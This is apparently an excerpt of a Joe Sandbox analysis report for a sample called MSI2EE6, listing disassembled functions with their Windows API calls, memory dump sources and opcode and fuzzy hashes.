                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 3736152602-0
                                                                          • Opcode ID: a22221d77b1d14bfea88440a2c5eee32e67db20a00d00e371910b3d228fba44f
                                                                          • Instruction ID: 00fc6b756f920e00a21bdc0f1ebb3022977d3048a21bfef077dfcf8919fbb2c0
                                                                          • Opcode Fuzzy Hash: a22221d77b1d14bfea88440a2c5eee32e67db20a00d00e371910b3d228fba44f
                                                                          • Instruction Fuzzy Hash: 67218332A10206BBDB189F15DC82AFA7BECEF54354F5040BAFD05E7181EB34DD948650
                                                                          APIs
                                                                            • Part of subcall function 00B0C819: GetLastError.KERNEL32(?,00000008,00B10950), ref: 00B0C81D
                                                                            • Part of subcall function 00B0C819: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0C8BF
                                                                          • EnumSystemLocalesW.KERNEL32(00B13E20,00000001,00000000,?,-00000050,?,00B1445E,00000000,?,?,?,00000055,?), ref: 00B13D64
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                          • String ID:
                                                                          • API String ID: 2417226690-0
                                                                          • Opcode ID: b6326a0b8564e05259300f4b8c56d4578aa9d96e2f382fd996cb5a4f7e6df359
                                                                          • Instruction ID: 67e336688aa5f9d9762605e3d43c60b47d2b5819f0b74e0cd7fd71bc5356133a
                                                                          • Opcode Fuzzy Hash: b6326a0b8564e05259300f4b8c56d4578aa9d96e2f382fd996cb5a4f7e6df359
                                                                          • Instruction Fuzzy Hash: 2E1125372003059FDB18AF39E8915BABBE2FF84758B54847CE94687A40E771BA82C740
                                                                          APIs
                                                                            • Part of subcall function 00B0C819: GetLastError.KERNEL32(?,00000008,00B10950), ref: 00B0C81D
                                                                            • Part of subcall function 00B0C819: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0C8BF
                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00B1403C,00000000,00000000,?), ref: 00B142DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 3736152602-0
                                                                          • Opcode ID: 95749919d016703e1f461c48435b630407450fb1b9ffdc722b5ff59d7719326d
                                                                          • Instruction ID: 71f1919b8e2e2be84fc6eadb4f43b4a8b5f77f8b8e364f19eb2c307884d26fde
                                                                          • Opcode Fuzzy Hash: 95749919d016703e1f461c48435b630407450fb1b9ffdc722b5ff59d7719326d
                                                                          • Instruction Fuzzy Hash: D5F0F932900111FBDB285B2098057FA7BE8EB40B54F4444B4ED15B3180EB70FD91C594
                                                                          APIs
                                                                            • Part of subcall function 00B0C819: GetLastError.KERNEL32(?,00000008,00B10950), ref: 00B0C81D
                                                                            • Part of subcall function 00B0C819: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0C8BF
                                                                          • EnumSystemLocalesW.KERNEL32(00B14080,00000001,?,?,-00000050,?,00B14422,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00B13DD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                          • String ID:
                                                                          • API String ID: 2417226690-0
                                                                          • Opcode ID: ff89777ea7926f73b614380baadda00278bd294eaaba060ecc77f9ee68ba008e
                                                                          • Instruction ID: 4909a6f3a192d6e60d3f04512726ada22e05686140f317d6aa8c59f7cd33aa75
                                                                          • Opcode Fuzzy Hash: ff89777ea7926f73b614380baadda00278bd294eaaba060ecc77f9ee68ba008e
                                                                          • Instruction Fuzzy Hash: CEF046322003046FCB145F35EC81ABA7FD4EF80768B5580BCF9424B690E6729D81C640
                                                                          APIs
                                                                            • Part of subcall function 00B08C61: EnterCriticalSection.KERNEL32(?,?,00B11BF6,00000000,00B2F1B8,0000000C,00B11BBD,?,?,00B0E158,?,?,00B0C9B7,00000001,00000364,?), ref: 00B08C70
                                                                          • EnumSystemLocalesW.KERNEL32(00B0E190,00000001,00B2F0D8,0000000C,00B0E5BF,00000000), ref: 00B0E1D5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                          • String ID:
                                                                          • API String ID: 1272433827-0
                                                                          • Opcode ID: dd57eed40a640dd5664b602eb0399d4853818bce130527620f8811260ba0a1d6
                                                                          • Instruction ID: 64cd6c007021b5b50292fdfa58f98d136f9fdf032fa641985f354af95fb9d9e7
                                                                          • Opcode Fuzzy Hash: dd57eed40a640dd5664b602eb0399d4853818bce130527620f8811260ba0a1d6
                                                                          • Instruction Fuzzy Hash: 8FF04F76A41204EFD700DF98E882B9D7BF0EB08B21F20456AF420EB2E1DB759940CF44
                                                                          APIs
                                                                          • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00AF6A8E,00000000,00B29719,00000004,00AF56AD,00B29719,00000004,00AF5AD7,00000000,00000000), ref: 00AF9020
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 60e8d125beb20029063fe0d224bcb6af313dfe564fc3a1e2ad10cb8c804203d4
                                                                          • Instruction ID: 8f0ed5e62e3c3e1ae4cb024de8d6930fbf985e10a535e642affd4f06440b6bb4
                                                                          • Opcode Fuzzy Hash: 60e8d125beb20029063fe0d224bcb6af313dfe564fc3a1e2ad10cb8c804203d4
                                                                          • Instruction Fuzzy Hash: 58E0D832650209B6D729CFFC9D0FFBB36A8E700749F504551F603E50D1DEA4CB009251
                                                                          APIs
                                                                            • Part of subcall function 00B0C819: GetLastError.KERNEL32(?,00000008,00B10950), ref: 00B0C81D
                                                                            • Part of subcall function 00B0C819: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0C8BF
                                                                          • EnumSystemLocalesW.KERNEL32(00B13C00,00000001,?,?,?,00B14480,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B13CDE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                          • String ID:
                                                                          • API String ID: 2417226690-0
                                                                          • Opcode ID: 679371071c67312730c5433a446c3ae4d3121da31d5fbacb10d1115536c3020d
                                                                          • Instruction ID: 30b9d3936ef085d9a60814da68db8c859051dbabdb979da90a67d0a783873665
                                                                          • Opcode Fuzzy Hash: 679371071c67312730c5433a446c3ae4d3121da31d5fbacb10d1115536c3020d
                                                                          • Instruction Fuzzy Hash: 42F0E53A30030567CB149F36D855AAA7FD4EFC1B54B4680A9EE099B290D6759982C790
                                                                          APIs
                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00B0BE7A,?,20001004,00000000,00000002,?,?,00B0B47C), ref: 00B0E74E
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 19bdd259e3b379a2316f50cab31670f8b3d97010375e1a6fc254a61b5f5dfdd3
                                                                          • Instruction ID: c3ffa6a1b158c389d9f2acb0920308268a93a10207062bb365325f4fbcf0865c
                                                                          • Opcode Fuzzy Hash: 19bdd259e3b379a2316f50cab31670f8b3d97010375e1a6fc254a61b5f5dfdd3
                                                                          • Instruction Fuzzy Hash: FFE04F32500228BBCF122F60EC05F9E3F59EF44750F048850FD25661A1CB71CD20ABE5
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0002A2C0,00AF9B95), ref: 00AFA2AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 7acc32c0334144f260753e78b128e6fecef3760dded58d2645c7cd7ab9c0bbbf
                                                                          • Instruction ID: 26aa4bff9ada288d024ab4a46c5d3d698bf84efac270447d6b61a938a1bfcd68
                                                                          • Opcode Fuzzy Hash: 7acc32c0334144f260753e78b128e6fecef3760dded58d2645c7cd7ab9c0bbbf
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                            • Part of subcall function 00AF9618: AcquireSRWLockExclusive.KERNEL32(00B32B64,?,?,?,00AD2656,00B3376C,5E20FB0F,?,?,00B1A2AD,000000FF,?,00AD1A17), ref: 00AF9623
                                                                            • Part of subcall function 00AF9618: ReleaseSRWLockExclusive.KERNEL32(00B32B64,?,?,00AD2656,00B3376C,5E20FB0F,?,?,00B1A2AD,000000FF,?,00AD1A17,?,?,?,5E20FB0F), ref: 00AF965D
                                                                          • GetProcessHeap.KERNEL32 ref: 00AD2605
                                                                            • Part of subcall function 00AF95C7: AcquireSRWLockExclusive.KERNEL32(00B32B64,?,?,00AD26C7,00B3376C,00B1DD70), ref: 00AF95D1
                                                                            • Part of subcall function 00AF95C7: ReleaseSRWLockExclusive.KERNEL32(00B32B64,?,?,00AD26C7,00B3376C,00B1DD70), ref: 00AF9604
                                                                            • Part of subcall function 00AF95C7: WakeAllConditionVariable.KERNEL32(00B32B60,?,?,00AD26C7,00B3376C,00B1DD70), ref: 00AF960F
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ExclusiveLock$AcquireRelease$ConditionHeapProcessVariableWake
                                                                          • String ID:
                                                                          • API String ID: 1755742941-0
                                                                          • Opcode ID: 2cea689a56f6edda9d1c555d04bf2c8c6f25ce91d0a611be0bb5c39e61a763f1
                                                                          • Instruction ID: 86eeb8d70e7c34ef159df400fb1f8e366a12881ec3d0027e3b39e3901a21086a
                                                                          • Opcode Fuzzy Hash: 2cea689a56f6edda9d1c555d04bf2c8c6f25ce91d0a611be0bb5c39e61a763f1
                                                                          • Instruction Fuzzy Hash: 3B215AF1900305EBD310DFA8EA06F6F77E0E705B20F600299E425973A0DB75AE848B91
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 4292702814-0
                                                                          • Opcode ID: 43510b74f77e3ccecc3971c6114f606fd4ac6a7d4d9d24faa8681c5eeb37faf0
                                                                          • Instruction ID: 66d37b1ff7af1900b36b42c90fc8e1db683f036482c321ba6fb828132885d09b
                                                                          • Opcode Fuzzy Hash: 43510b74f77e3ccecc3971c6114f606fd4ac6a7d4d9d24faa8681c5eeb37faf0
                                                                          • Instruction Fuzzy Hash: AD326D74A0021ADFCF14CF58C995ABEBBF5EF45304F2441A8D885A7395DA32AE46CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                          • String ID:
                                                                          • API String ID: 3471368781-0
                                                                          • Opcode ID: 7d04d101ebfb5444e4e3e6c85655ff430d12b47d27d4b73d8155f8f3012d4e2d
                                                                          • Instruction ID: e80d8786b45c49334fc599411d101f2f703868e60128a6fbe62f1e345eae23f4
                                                                          • Opcode Fuzzy Hash: 7d04d101ebfb5444e4e3e6c85655ff430d12b47d27d4b73d8155f8f3012d4e2d
                                                                          • Instruction Fuzzy Hash: C6B125B55003419BDB349F28CC92AF7B3E9EB10B08F9445ADE94386680FA75AEC5CB00
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1c70457302a6f542b4b6ff30bbb3d2ed515c4c5d23e60702613d0b88073ea47a
                                                                          • Instruction ID: 58ce959db348c4cca2b0ff89cdb3f0e2bac94170049f565a88ad04de8c05cce1
                                                                          • Opcode Fuzzy Hash: 1c70457302a6f542b4b6ff30bbb3d2ed515c4c5d23e60702613d0b88073ea47a
                                                                          • Instruction Fuzzy Hash: F0516171E00219AFDF14CF99C985AEEBFF5EF88700F198099E515AB241C7349E50DB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                          • Instruction ID: 194920c4042a7f25d44d33d36fd1078c219d0ad2ce1efefe24929783d9a6c3ce
                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                          • Instruction Fuzzy Hash: 6A115E7B31008A43D614CBEED9B45B7D7B5EBC532272C437AF3434BB45C32295419520
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6368cd5ad71341a1b29a6c97cf458ea0cd2b9c300a31ba0e5531929605537af1
                                                                          • Instruction ID: 63d8b5b607dd3f382d1d7352f9f593d12f41534597c1e372525398ccb373d0cc
                                                                          • Opcode Fuzzy Hash: 6368cd5ad71341a1b29a6c97cf458ea0cd2b9c300a31ba0e5531929605537af1
                                                                          • Instruction Fuzzy Hash: 7DE08C32A21238EBCB14EB8CC90498AF3ECEB45B50B510496B511D3242C2B0DE80D7D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee2e060d41377332e3052d441e23bfaf2e5d4587f851b6276e8910fada055d62
                                                                          • Instruction ID: 5ebca76cb6a9dc61e0d050fd22ee0d97204ed7c863a6892036e3d753dd558031
                                                                          • Opcode Fuzzy Hash: ee2e060d41377332e3052d441e23bfaf2e5d4587f851b6276e8910fada055d62
                                                                          • Instruction Fuzzy Hash: 60C08CB400098046EF29D914C3713A433D4E3D17C2FC004CCCA020B6D3E61EDCCADA40
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00AD8A4D
                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00AD8AA0
                                                                          • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00B1B135,000000FF), ref: 00AD8AAF
                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00AD8ACB
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00B1B135,000000FF), ref: 00AD8BAB
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00B1B135,000000FF), ref: 00AD8BB7
                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00B1B135,000000FF), ref: 00AD8BF3
                                                                          • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00B1B135,000000FF), ref: 00AD8C12
                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00B1B135,000000FF), ref: 00AD8C2F
                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00B1B135,000000FF), ref: 00AD8CC3
                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00AD8D08
                                                                          • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00AD8D5A
                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,00B1B135,000000FF), ref: 00AD8D8D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                          • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                          • API String ID: 2199533872-3004881174
                                                                          • Opcode ID: 94f040bde1f64d5f17d19c1e92e5458a0ef69edec1388f02597ae7f91c7b4c6f
                                                                          • Instruction ID: 22cb94c1424cc3169ee4cf23b4a22837f7ad04c6e2e25cb8668a76084e3a40bf
                                                                          • Opcode Fuzzy Hash: 94f040bde1f64d5f17d19c1e92e5458a0ef69edec1388f02597ae7f91c7b4c6f
                                                                          • Instruction Fuzzy Hash: 19C136B1900245AFEB209F28CC45BEFBBB5EF55700F14411BE916AB3D1EB788A05C7A1
                                                                          APIs
                                                                          • LocalAlloc.KERNEL32(00000040,00000018,5E20FB0F,00000000,?), ref: 00ADF5C6
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADF603
                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADF66D
                                                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADF807
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADF8C4
                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00ADF8EC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                          • String ID: bad locale name$false$true
                                                                          • API String ID: 975656625-1062449267
